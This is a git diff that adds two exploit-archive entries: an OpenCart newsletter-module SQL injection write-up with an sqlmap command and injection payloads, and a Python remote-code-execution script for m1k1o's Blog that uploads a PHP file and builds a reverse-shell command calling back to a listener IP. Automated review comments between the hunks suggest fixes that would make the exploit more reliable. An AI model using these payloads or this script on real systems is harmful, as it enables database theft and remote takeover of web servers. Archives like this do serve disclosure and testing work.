diff --git a/exploits/php/webapps/50942.txt b/exploits/php/webapps/50942.txt
new file mode 100644
index 000000000..b0f6740eb
--- /dev/null
+++ b/exploits/php/webapps/50942.txt
@@ -0,0 +1,56 @@
+# Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi
+# Date: 19/05/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez
+# Version: v.3.0.2.0
+# Tested on: XAMPP, Linux
+# Contact: https://twitter.com/dmaral3noz
+
+
+* Description :
+
+Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+* Steps to Reproduce :
+- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter
+- Save request in BurpSuite
+- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs
+
+
+
+Request :
+
+===========
+
+POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip,deflate
+Content-Length: 29
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Connection: Keep-alive
+
+zemez_newsletter_email=saud
+
+
+===========
+
+Output :
+
+Parameter: zemez_newsletter_email (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+ Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -
+
+ Type: error-based
+ Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK
\ No newline at end of file
diff --git a/exploits/php/webapps/50943.py b/exploits/php/webapps/50943.py
new file mode 100755
index 000000000..fa61520c1
--- /dev/null
+++ b/exploits/php/webapps/50943.py
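Review bot: The reproduction step runs sqlmap with `--risk=3`, which enables OR-based payloads (the error-based one in the output already starts `saud%' OR (...)`) that sqlmap itself warns can modify or delete rows when the injected statement turns out to be an UPDATE or DELETE; the write-up should carry that caveat and suggest confirming with `--risk=1 --technique=B` (or the single time-based payload shown) before anything more aggressive on a live shop. The title calls this "Blind SQLi" while the output lists an error-based technique too, and the `saud%'` prefix in every payload suggests the address is interpolated unescaped into a LIKE clause, so the description could state the injection context rather than only the technique. "Save request in BurpSuite" does not say where, yet the next step assumes `sql.txt`; name the file in that step. No remediation is given; one line noting that the module should pass the value through OpenCart's `$this->db->escape()` (or bind it) would round the advisory out.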
@@ -0,0 +1,161 @@
+# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
+# Date: 2022-01-06
+# Exploit Author: Malte V
+# Vendor Homepage: https://github.com/m1k1o/blog
+# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
+# Version: 1.3 and below
+# Tested on: Linux
+# CVE : CVE-2022-23626
+
+import argparse
+import json
+import re
+from base64 import b64encode
+import requests as req
+from bs4 import BeautifulSoup
+
+parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')
+parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)
+parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',
+ required=False)
+parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,
+ required=False)
+parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,
+ required=False)
+parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)
+parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)
+
+args = vars(parser.parse_args())
+
+username = args['username']
+password = args['password']
+lhost_ip = args['ip']
+lhost_port = args['lport']
+address = args['url']
+port = args['port']
+url = f"http://{address}:{port}"
+
+blog_cookie = ""
+csrf_token = ""
+exploit_file_name = ""
+header = {
+ "Host": f"{address}",
+ "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+ "X-Requested-With": "XMLHttpRequest",
+ "Csrf-Token": f"{csrf_token}",
+ "Cookie": f"PHPSESSID={blog_cookie}"
+}
+
+
+def get_cookie(complete_url):
+ global blog_cookie
+ cookie_header = {}
+ if not blog_cookie:
+ cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"
+ result = req.get(url=complete_url, headers=cookie_header)
+ if result.status_code == 200:
+ blog_cookie = result.cookies.get_dict()['PHPSESSID']
+ print(f'[+] Found PHPSESSID: {blog_cookie}')
+ grep_csrf(result)
+
+
+def grep_csrf(result):
+ global csrf_token
+ csrf_regex = r"[a-f0-9]{10}"
+ soup = BeautifulSoup(result.text, 'html.parser')
+ script_tag = str(soup.findAll('script')[1].contents[0])
+ csrf_token = re.search(csrf_regex, script_tag).group(0)
+ print(f'[+] Found CSRF-Token: {csrf_token}')
+
+
+def login(username, password):
+ get_cookie(url)
+ login_url = f"{url}/ajax.php"
+ login_data = f"action=login&nick={username}&pass={password}"
+ login_header = {
+ "Host": f"{address}",
+ "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+ "X-Requested-With": "XMLHttpRequest",
+ "Csrf-Token": f"{csrf_token}",
+ "Cookie": f"PHPSESSID={blog_cookie}"
+ }
+ result = req.post(url=login_url, headers=login_header, data=login_data)
+ soup = BeautifulSoup(result.text, 'html.parser')
+ login_content = json.loads(soup.text)
+ if login_content.get('logged_in'):
+ print('[*] Successful login')
+ else:
+ print('[!] Bad login')
+
+
+def set_cookie(result):
+ global blog_cookie
+ blog_cookie = result.cookies.get_dict()['PHPSESSID']
+
+
+def generate_payload(command):
+ return f"""
+-----------------------------13148889121752486353560141292
+Content-Disposition: form-data; name="file"; filename="malicious.gif.php"
+Content-Type: application/x-httpd-php
+
+GIF;
+-----------------------------13148889121752486353560141292--
+"""
+
+
+def send_payload():
+ payload_header = {
+ "Host": f"{address}",
+ "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+ "X-Requested-With": "XMLHttpRequest",
+ "Csrf-Token": f"{csrf_token}",
+ "Cookie": f"PHPSESSID={blog_cookie}"
+ }
+ upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"
+ command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"
+ payload = generate_payload(command)
+ print(f"[+] Upload exploit")
+ result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})
+ set_exploit_file_name(result.content.decode('ascii'))
+
+
+def set_exploit_file_name(data):
+ global exploit_file_name
+ file_regex = r"[a-zA-Z0-9]{4,5}.php"
+ exploit_file_name = re.search(file_regex, data).group(0)
+
+
+def call_malicious_php(file_name):
+ global header
+ complete_url = f"{url}/data/i/{file_name}"
+ print('[*] Calling reverse shell')
+ result = req.get(url=complete_url)
+
+
+def check_reverse_shell():
+ yes = {'yes', 'y', 'ye', ''}
+ no = {'no', 'n'}
+ choice = input("Have you got an active netcat listener (y/Y or n/N): ")
+ if choice in yes:
+ return True
+ elif choice in no:
+ print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")
+ return False
+
+def main():
+ enabled_listener = check_reverse_shell()
+ if enabled_listener:
+ login(username, password)
+ send_payload()
+ call_malicious_php(exploit_file_name)
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3cb376b94..8e18cbd1f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -45004,3 +45004,5 @@ id,file,description,date,author,type,platform,port
 50938,exploits/multiple/webapps/50938.txt,"T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)",1970-01-01,"Alperen Ergel",webapps,multiple,
 50939,exploits/multiple/webapps/50939.txt,"T-Soft E-Commerce 4 - SQLi (Authenticated)",1970-01-01,"Alperen Ergel",webapps,multiple,
 50941,exploits/php/webapps/50941.txt,"Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Akshay Ravi",webapps,php,
+50942,exploits/php/webapps/50942.txt,"OpenCart v3.x Newsletter Module - Blind SQLi",1970-01-01,"Saud Alenazi",webapps,php,
+50943,exploits/php/webapps/50943.py,"m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Malte V",webapps,php,
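Review bot: `send_payload` pins `proxies={"http": "http://127.0.0.1:8080"}` on the upload request, so the exploit raises a ConnectionError on any machine without an intercepting proxy listening there; drop the argument or expose it as an option (`--proxy`, default `None`). `login` prints "Bad login" but returns nothing, and `main` goes on to `send_payload()` and `call_malicious_php()` regardless, so a failed login still fires the upload with whatever session is in `blog_cookie`; return `bool(login_content.get('logged_in'))` and gate with `if not login(username, password): return`. `generate_payload(command)` never uses `command` — the multipart body as committed contains only `GIF;`, so unless a `<?php ... ?>` line was lost in rendering, the uploaded `.php` executes nothing and the "Calling reverse shell" step is a no-op. `login_data` is built by string formatting, so a username or password containing `&`, `=` or `%` corrupts the form; pass `data={'action': 'login', 'nick': username, 'pass': password}` and let requests encode it. `b64encode` and the module-level `header` dict (which freezes the empty `csrf_token`/`blog_cookie` at import time) are never used and can go.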
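Review bot: Both new index rows carry `1970-01-01` in the date column while the exploit headers added in the same commit say `19/05/2022` and `2022-01-06`; the surrounding context rows use the same epoch placeholder, so this may be an established convention of the index, but if the column is meant to be the publication date it should be filled from the headers. The second row's title `m1k1o's Blog v.10` also disagrees with the script header's `# Version: 1.3 and below`; one of the two should be corrected so the index and the file agree.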